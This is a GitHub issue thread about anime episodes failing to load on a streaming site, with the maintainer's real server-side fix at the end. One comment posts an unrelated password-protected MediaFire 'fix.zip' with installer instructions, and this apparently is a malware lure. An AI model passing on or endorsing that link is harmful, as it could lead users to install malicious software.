### ISSUE TITLE
Episode not loading

### ISSUE THREAD

**Issue by skgupta507** [Amritanshu312/Taro#2]
Hey @Amritanshu312 the episodes are not loading on any of the animes. it says sub episode not found.
can u fix this issue.

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by skgupta507** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

what does this file intend to do
cause iam asking about the website issue.
the episodes are not loading on the website

**Comment by Amritanshu312** [comment]
> Hey @Amritanshu312 the episodes are not loading on any of the animes. it says sub episode not found. can u fix this issue.

I’ve already addressed the issue. The problem was that the API endpoint didn’t have access to the necessary environment variables. To fix it, I refactored the API endpoint to a function-based structure and removed the old endpoint. This change ensures compatibility with the Vercel serverless environment. You should see it working correctly now!
